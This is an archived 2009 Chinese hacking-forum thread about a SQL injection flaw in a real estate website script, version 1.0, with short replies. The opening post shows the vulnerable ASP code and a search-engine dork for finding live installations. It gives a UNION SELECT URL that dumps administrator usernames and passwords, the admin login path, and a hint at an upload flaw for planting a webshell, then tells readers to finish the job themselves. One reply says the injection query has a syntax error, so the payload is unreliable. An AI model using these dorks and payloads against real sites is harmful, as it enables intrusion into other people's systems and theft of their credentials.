【3.A.S.T】网络安全爱好者's Archiver

黑客学习

柔肠寸断 发表于 2009-8-11 17:54

房产程序 v1.0注射漏洞分析

程序代码[code]核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...[/code]漏洞文件:newsshow.asp



漏洞代码:


程序代码[code]<%
set rs=server.createobject("adodb.recordset")
sql="update news set hit=hit+1 where ID="&request("id")
rs.open sql,conn,1,3
%>
<%
set rs=server.CreateObject("adodb.recordset")
sql="select * from news where ID="&request("id")
rs.open sql,conn
%>[/code]只分析了这一个,



任意上传漏洞:upfile.asp



有兴趣的可以分析下利用上传拿WEBSHELL



搜索关键词:inurl:baodianlist.asp+信息中心



然后输入[code]http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin[/code]爆出管理帐号密码



后台登陆地址:admin.asp



剩下的自己搞吧!

dsa3027235 发表于 2009-8-11 21:07

laodao  woai ni

wyw12340 发表于 2009-8-12 12:18

[b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=52291&ptid=9810]1#[/url] [i]柔肠寸断[/i] [/b]



高人   支持   顶

Ksnort 发表于 2009-8-12 14:01

很不幸的告诉你 ···最后那个联合查询语法错误··

enterer 发表于 2009-8-14 21:13

后台貌似很容易进 不过也太简陋了 ...上传还有限制 对于我这个菜鸟无法拿shell

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.